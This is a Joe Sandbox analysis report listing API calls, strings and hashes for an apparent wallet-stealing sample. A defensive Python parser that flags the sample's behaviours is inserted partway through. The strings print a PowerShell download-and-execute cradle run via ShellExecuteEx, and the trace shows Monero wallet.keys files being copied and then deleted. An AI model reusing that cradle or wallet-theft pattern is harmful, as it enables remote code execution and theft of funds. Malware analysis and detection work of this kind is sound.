                    • Instruction ID: 3b8668429cc0a394c23ff978b59a21bc33056484ef53db96f1a160ee800f1571
                    • Opcode Fuzzy Hash: c4a599c38dcaeef2a59b3c79f24eec2f0fb8db02b6db598fbac6f117439dcbc0
                    • Instruction Fuzzy Hash: 390117F9A40308BFDB00DFE4DC49FAEB7B9EB44705F104659FA05A7281DA745540CB55
                    APIs
                    • CreateFileA.KERNEL32(:H,80000000,00000003,00000000,00000003,00000080,00000000,?,00483AEE,?), ref: 004892FC
                    • GetFileSizeEx.KERNEL32(000000FF,:H), ref: 00489319
                    • CloseHandle.KERNEL32(000000FF), ref: 00489327
                    Strings
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleSize
                    • String ID: :H$:H
                    • API String ID: 1378416451-2582992418
                    • Opcode ID: bda397af67583db6e3de5d6453b002127e45ac22a63408c4a056109f8d1084e1
                    • Instruction ID: 05ad29bb4ad390bdae663519d14aaaa6481c414137e95920f806c2d03df9155d
                    • Opcode Fuzzy Hash: bda397af67583db6e3de5d6453b002127e45ac22a63408c4a056109f8d1084e1
                    • Instruction Fuzzy Hash: D3F03179E44204BBDB10DFF4DC45B9E77B9AB48710F108654B951A72C0DA749A418B45
                    APIs
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004799EC
                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00479A11
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00479A31
                    • ReadFile.KERNEL32(000000FF,?,00000000,0047148F,00000000), ref: 00479A5A
                    • LocalFree.KERNEL32(0047148F), ref: 00479A90
                    • CloseHandle.KERNEL32(000000FF), ref: 00479A9A
                    Yara matches
                    Similarity
                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                    • String ID:
                    • API String ID: 2311089104-0
                    • Opcode ID: 66008b071b6194975339f42e17d5fecb39c2fb2b4cd9b68048b0d0bdf50fa993
                    • Instruction ID: e650c839876b6a824f6c435b2c9bcfaa3539d902a7f2b62aedde137387db8f00
                    • Opcode Fuzzy Hash: 66008b071b6194975339f42e17d5fecb39c2fb2b4cd9b68048b0d0bdf50fa993
                    • Instruction Fuzzy Hash: 5731F3B4A00209EFDB14DFA4C885BEE77B9FF48310F108159E905A7390D778AA81CFA5
                    APIs
                    • lstrcat.KERNEL32(?,0123E370), ref: 004847DB
                      • Part of subcall function 00488DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00488E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00484801
                    • lstrcat.KERNEL32(?,?), ref: 00484820
                    • lstrcat.KERNEL32(?,?), ref: 00484834
                    • lstrcat.KERNEL32(?,0122B7C8), ref: 00484847
                    • lstrcat.KERNEL32(?,?), ref: 0048485B
                    • lstrcat.KERNEL32(?,0123D5E0), ref: 0048486F
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 00488D90: GetFileAttributesA.KERNEL32(00000000,?,00471B54,?,?,0049564C,?,?,00490E1F), ref: 00488D9F
                      • Part of subcall function 00484570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00484580
                      • Part of subcall function 00484570: RtlAllocateHeap.NTDLL(00000000), ref: 00484587
                      • Part of subcall function 00484570: wsprintfA.USER32 ref: 004845A6
                      • Part of subcall function 00484570: FindFirstFileA.KERNEL32(?,?), ref: 004845BD
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                    • String ID:
                    • API String ID: 2540262943-0
                    • Opcode ID: 71f39181dd346d1576259280032853e68151b54b0bf547d75706677907b8bdb3
                    • Instruction ID: 88c901e6a310bb55aa2c28cd222cc140c3c08222040f05a88a23c4d49be9ab44
                    • Opcode Fuzzy Hash: 71f39181dd346d1576259280032853e68151b54b0bf547d75706677907b8bdb3
                    • Instruction Fuzzy Hash: 343162F290020867CB15FBB0DC85EED737DAB58704F40498EB31996091EEB897C9CB99
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00482D85
                    Strings
                    • <, xrefs: 00482D39
                    • ')", xrefs: 00482CB3
                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00482CC4
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00482D04
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    • API String ID: 3031569214-898575020
                    • Opcode ID: c418c491b281641586fed287784b349a63fe2ee70b7dfe1dea5b3d57aefd0a3b
                    • Instruction ID: c4c91a9559a0f6b8f68e0d410487a6368f543847ff02eb1baea553f9bb7ae2cf
                    • Opcode Fuzzy Hash: c418c491b281641586fed287784b349a63fe2ee70b7dfe1dea5b3d57aefd0a3b
                    • Instruction Fuzzy Hash: 9041D271C101089AEB14FBA1C891BDDBB74AF10304F50496FE116B6191DFBC6A5ACFA9
                    APIs
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00479F41
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    Strings
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$AllocLocal
                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                    • API String ID: 4171519190-1096346117
                    • Opcode ID: 8801dc95ad90ccebb616d518643c663084db372c3f01567a11cd8a71615912a6
                    • Instruction ID: 6c3e8f3df84a1a876bde7f14585e1aba85a190e5601eb19cb8303ed41722e5ed
                    • Opcode Fuzzy Hash: 8801dc95ad90ccebb616d518643c663084db372c3f01567a11cd8a71615912a6
                    • Instruction Fuzzy Hash: 81615270900248AFDB14FFA5CC95FED7775AF44304F00841AF90A5B191EBBC6A15CB56
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000001,0123D880,00000000,00020119,?), ref: 004840F4
                    • RegQueryValueExA.ADVAPI32(?,0123E3B8,00000000,00000000,00000000,000000FF), ref: 00484118
                    • RegCloseKey.ADVAPI32(?), ref: 00484122
                    • lstrcat.KERNEL32(?,00000000), ref: 00484147
                    • lstrcat.KERNEL32(?,0123E130), ref: 0048415B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$CloseOpenQueryValue
                    • String ID:
                    • API String ID: 690832082-0
                    • Opcode ID: ff825339333d0afb8825567ccc9b01b68fa380ec3792336978026a6f49de6ee9
                    • Instruction ID: 6f4dea2adf1394992b6cb75e4aa6c1249e345dfb928b5e8d6b408592f2409ff4
                    • Opcode Fuzzy Hash: ff825339333d0afb8825567ccc9b01b68fa380ec3792336978026a6f49de6ee9
                    • Instruction Fuzzy Hash: 774187B6D001087BDB14FBE0DC46FFE737DAB88304F408A5DB61956181EA795BC88B92
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00487E37
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00487E3E
                    • RegOpenKeyExA.ADVAPI32(80000002,0122C540,00000000,00020119,?), ref: 00487E5E
                    • RegQueryValueExA.ADVAPI32(?,0123D960,00000000,00000000,000000FF,000000FF), ref: 00487E7F
                    • RegCloseKey.ADVAPI32(?), ref: 00487E92
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: f4fadb6d3e731b5234ac414ccd7e53943f963fa8f02436acccfbf02e2a98feae
                    • Instruction ID: 395210cb7b00f703fa3c10765d5ff77899ed5d0f77d278b1d8dcf0d60de38417
                    • Opcode Fuzzy Hash: f4fadb6d3e731b5234ac414ccd7e53943f963fa8f02436acccfbf02e2a98feae
                    • Instruction Fuzzy Hash: 71118CB1A44205EBD700DFD4DD59FBFBBB9EB04B00F20465AF605A7280D77858018BA2
                    APIs
                    • StrStrA.SHLWAPI(0123E0A0,?,?,?,0048140C,?,0123E0A0,00000000), ref: 0048926C
                    • lstrcpyn.KERNEL32(006BAB88,0123E0A0,0123E0A0,?,0048140C,?,0123E0A0), ref: 00489290
                    • lstrlen.KERNEL32(?,?,0048140C,?,0123E0A0), ref: 004892A7
                    • wsprintfA.USER32 ref: 004892C7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpynlstrlenwsprintf
                    • String ID: %s%s
                    • API String ID: 1206339513-3252725368
                    • Opcode ID: db2ddbc0f3803dd0773b863ff21b2de78811a149bfefa31aa2d4c947beae9745
                    • Instruction ID: ade12047d49ec16142079e79ff349ce2d526d60f3c08eab9abea82262e99e2bd
                    • Opcode Fuzzy Hash: db2ddbc0f3803dd0773b863ff21b2de78811a149bfefa31aa2d4c947beae9745
                    • Instruction Fuzzy Hash: 68011EB5500108FFCB04DFECC998EAE7BBAEB44350F148648F9099B300C635AE80DB95
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004712B4
                    • RtlAllocateHeap.NTDLL(00000000), ref: 004712BB
                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004712D7
                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004712F5
                    • RegCloseKey.ADVAPI32(?), ref: 004712FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: cf6d9036ce1eff8a13677519e6179d62cb43cd8a8a0bec070514430646846a0d
                    • Instruction ID: 252718de77c326162cd5f7b0f3908403d9e1cfa78d9ebc9430491b78ac4b67ef
                    • Opcode Fuzzy Hash: cf6d9036ce1eff8a13677519e6179d62cb43cd8a8a0bec070514430646846a0d
                    • Instruction Fuzzy Hash: D60131F9A40208BBDB00DFE4DC49FAEB7BDEB48701F008299FA0597280DA749A418F51
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: String___crt$Type
                    • String ID:
                    • API String ID: 2109742289-3916222277
                    • Opcode ID: aa65c7912cf7d29ed0fdf8454787d5b3d55b6bcf72ea1716163b533f88ad41b4
                    • Instruction ID: ebe8bf36303019e9beeee53e23645fa19f4e126c8360d2e1166d2201a75dc433
                    • Opcode Fuzzy Hash: aa65c7912cf7d29ed0fdf8454787d5b3d55b6bcf72ea1716163b533f88ad41b4
                    • Instruction Fuzzy Hash: FA4128B150075C5EDB21AB248DC4FFF7BE89F05308F1448EEE98A86182D2799A458F78
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00486663
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00486726
                    • ExitProcess.KERNEL32 ref: 00486755
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                    • String ID: <
                    • API String ID: 1148417306-4251816714
                    • Opcode ID: bce197add49273dd42ffbcd4df3ab1733c5e36b25c943b11706168b06ba53206
                    • Instruction ID: aebbd7c8278ad27288c4f635b91afe39de2c6b899d8e3c59d9e29790f3a40fa2
                    • Opcode Fuzzy Hash: bce197add49273dd42ffbcd4df3ab1733c5e36b25c943b11706168b06ba53206
                    • Instruction Fuzzy Hash: FA314DF1801218AADB14FB91DC91BDD7778AF04304F80559EF20566191DFB86B89CF6A
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00490E28,00000000,?), ref: 0048882F
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00488836
                    • wsprintfA.USER32 ref: 00488850
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                    • String ID: %dx%d
                    • API String ID: 1695172769-2206825331
                    • Opcode ID: e2a582261eeca50a4f1f93a384fdb9d1b0a225c4f031073236184f83bbb345c8
                    • Instruction ID: 75f4060d866df39a49b2399239ab9442a0f51fcbf014a942fed93075b3f33f1c
                    • Opcode Fuzzy Hash: e2a582261eeca50a4f1f93a384fdb9d1b0a225c4f031073236184f83bbb345c8
                    • Instruction Fuzzy Hash: FF216DF1A40208AFDB00DFD4DD49FAEBBB9FB48700F104219F605A7680C779A900CBA5
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0048951E,00000000), ref: 00488D5B
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00488D62
                    • wsprintfW.USER32 ref: 00488D78
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcesswsprintf
                    • String ID: %hs
                    • API String ID: 769748085-2783943728
                    • Opcode ID: b7b9d6b7cebd46ee4bf166386c7372f8bb800e41940652e2e4728a89a0fe2f45
                    • Instruction ID: 34134da81248140181aeb7a4fa53f56592a3f7e3116884f2f94f182295505579
                    • Opcode Fuzzy Hash: b7b9d6b7cebd46ee4bf166386c7372f8bb800e41940652e2e4728a89a0fe2f45
                    • Instruction Fuzzy Hash: B6E086B4A40208BFC700DBD4DC0DE5977BCEB04701F000254FD0987640D9715E408B56
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 00488B60: GetSystemTime.KERNEL32(00490E1A,0123A250,004905AE,?,?,004713F9,?,0000001A,00490E1A,00000000,?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 00488B86
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0047A2E1
                    • lstrlen.KERNEL32(00000000,00000000), ref: 0047A3FF
                    • lstrlen.KERNEL32(00000000), ref: 0047A6BC
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                    • DeleteFileA.KERNEL32(00000000), ref: 0047A743
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 679296f508632343cb8462a6d2e40ba384b029e712a21f4756a4b9a74033fbb5
                    • Instruction ID: 083da783821a49411c6cc8b97341e9c8b0f6ee616210dd508b334f5d4c27d108
                    • Opcode Fuzzy Hash: 679296f508632343cb8462a6d2e40ba384b029e712a21f4756a4b9a74033fbb5
                    • Instruction Fuzzy Hash: 44E1E3B28101189AEB04FBA5DC91EEE7338AF14304F50895FF51672091EF7C6A59CB7A
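The records above are per-function API lists in one fixed line format. The Python script below is an added example (not part of the Joe Sandbox report and not code from the analysed sample) that parses that format and flags the three behaviours the records show: a RegOpenKeyExA whose first argument is a predefined hive handle (80000001 is HKEY_CURRENT_USER, 80000002 is HKEY_LOCAL_MACHINE) and whose samDesired value 00020119 decodes to KEY_READ | KEY_WOW64_64KEY; a CopyFileA followed by DeleteFileA in a function whose callees reference \Monero\wallet.keys; and GetModuleFileNameA, ShellExecuteEx and ExitProcess together in one function. The line grammar, the sample trace (a constructed subset of the lines on this page) and the finding names are assumptions of this example; the hive handles and KEY_* bits are the Windows SDK constants.

```python
"""Parse per-function API lists from a Joe Sandbox report and flag stealer behaviour.
Added example; the line format is assumed from the call lines shown on this page."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: a subset of the call lines from the records above.
SAMPLE_TRACE = r"""APIs
• RegOpenKeyExA.ADVAPI32(80000001,0123D880,00000000,00020119,?), ref: 004840F4
• RegQueryValueExA.ADVAPI32(?,0123E3B8,00000000,00000000,00000000,000000FF), ref: 00484118
• RegCloseKey.ADVAPI32(?), ref: 00484122
APIs
  • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0047A2E1
• DeleteFileA.KERNEL32(00000000), ref: 0047A743
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00486663
• ShellExecuteEx.SHELL32(0000003C), ref: 00486726
• ExitProcess.KERNEL32 ref: 00486755
"""

# One call line; the argument list is optional (wsprintfA / ExitProcess lines have none).
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

# Predefined hive handles and KEY_* access bits, from the Windows SDK (winreg.h / winnt.h).
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_RIGHTS = [(0x1, "KEY_QUERY_VALUE"), (0x2, "KEY_SET_VALUE"), (0x4, "KEY_CREATE_SUB_KEY"),
              (0x8, "KEY_ENUMERATE_SUB_KEYS"), (0x10, "KEY_NOTIFY"), (0x20, "KEY_CREATE_LINK"),
              (0x100, "KEY_WOW64_64KEY"), (0x200, "KEY_WOW64_32KEY"), (0x20000, "READ_CONTROL")]
KEY_READ = 0x20019  # READ_CONTROL | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: int                # address of the call site
    subcall: Optional[int]  # callee address when the line is "Part of subcall function"


def parse_hex(token: str) -> Optional[int]:
    """Value of a hex argument, or None for '?' and symbolic arguments."""
    try:
        return int(token, 16)
    except ValueError:
        return None


def decode_key_access(mask: int) -> list:
    """Name the KEY_* bits set in a samDesired mask; unknown bits are kept as hex."""
    names = [name for bit, name in KEY_RIGHTS if mask & bit]
    leftover = mask & ~sum(bit for bit, _ in KEY_RIGHTS)
    if leftover:
        names.append(f"0x{leftover:X}")
    return names


def parse_trace(text: str) -> list:
    """Split the report text into functions: one list of Call per 'APIs' header."""
    functions = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            functions.append([])
            continue
        m = CALL_RE.match(line)
        if not m or not functions:
            continue  # 'Strings', 'Memory Dump Source' and other non-call lines
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        functions[-1].append(Call(api=m["api"], module=m["mod"], args=args, ref=int(m["ref"], 16),
                                  subcall=int(m["sub"], 16) if m["sub"] else None))
    return functions


def analyze(functions: list) -> list:
    """Flag, per function, the three behaviours visible in the records above."""
    findings = []
    for idx, calls in enumerate(functions):
        # 1. Registry read: decode the hive handle and samDesired mask of RegOpenKeyExA.
        for c in calls:
            if c.api == "RegOpenKeyExA" and len(c.args) >= 4:
                hive, access = parse_hex(c.args[0]), parse_hex(c.args[3])
                if hive in HIVES and access is not None:
                    findings.append({"function": idx, "kind": "registry_read", "hive": HIVES[hive],
                                     "access": decode_key_access(access),
                                     "key_read": (access & KEY_READ) == KEY_READ})
        # 2. Wallet staging: CopyFileA followed (by address) by DeleteFileA in a function
        #    whose own calls or callees reference a wallet path.
        paths = [a for c in calls for a in c.args if "wallet" in a.lower()]
        copies = [c.ref for c in calls if c.api == "CopyFileA" and c.subcall is None]
        deletes = [c.ref for c in calls if c.api == "DeleteFileA" and c.subcall is None]
        if paths and copies and deletes and min(copies) < max(deletes):
            findings.append({"function": idx, "kind": "wallet_file_copy_then_delete", "path": paths[0]})
        # 3. Self-relaunch: resolve own image path, ShellExecuteEx it, then ExitProcess.
        if {"GetModuleFileNameA", "ShellExecuteEx", "ExitProcess"} <= {c.api for c in calls}:
            findings.append({"function": idx, "kind": "relaunch_self_then_exit"})
    return findings


if __name__ == "__main__":
    for finding in analyze(parse_trace(SAMPLE_TRACE)):
        print(finding)
```

Running the script prints one finding per function of the constructed sample; pasting further "APIs" records from this report into the same string extends the scan without changing the parser. The copy-then-delete check orders the two calls by their ref addresses, which is only a heuristic for straight-line code: a loop or a jump backwards would defeat it.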
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 00488B60: GetSystemTime.KERNEL32(00490E1A,0123A250,004905AE,?,?,004713F9,?,0000001A,00490E1A,00000000,?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 00488B86
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0047D481
                    • lstrlen.KERNEL32(00000000), ref: 0047D698
                    • lstrlen.KERNEL32(00000000), ref: 0047D6AC
                    • DeleteFileA.KERNEL32(00000000), ref: 0047D72B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 0fc626a0b29ec3b7c3a33f50d10a12740d06dc9ccf01ecb72ca222b264b6fe2a
                    • Instruction ID: 35ed16b6f1647c967c7b78d2a67c36eaed80b8bbaac4cf37637a9e6b4e87d7a4
                    • Opcode Fuzzy Hash: 0fc626a0b29ec3b7c3a33f50d10a12740d06dc9ccf01ecb72ca222b264b6fe2a
                    • Instruction Fuzzy Hash: 6A9112718101049AEB08FBA5DC92EEE7339AF14304F50496FF51672091EFBC6A59CB7A
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 00488B60: GetSystemTime.KERNEL32(00490E1A,0123A250,004905AE,?,?,004713F9,?,0000001A,00490E1A,00000000,?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 00488B86
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0047D801
                    • lstrlen.KERNEL32(00000000), ref: 0047D99F
                    • lstrlen.KERNEL32(00000000), ref: 0047D9B3
                    • DeleteFileA.KERNEL32(00000000), ref: 0047DA32
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
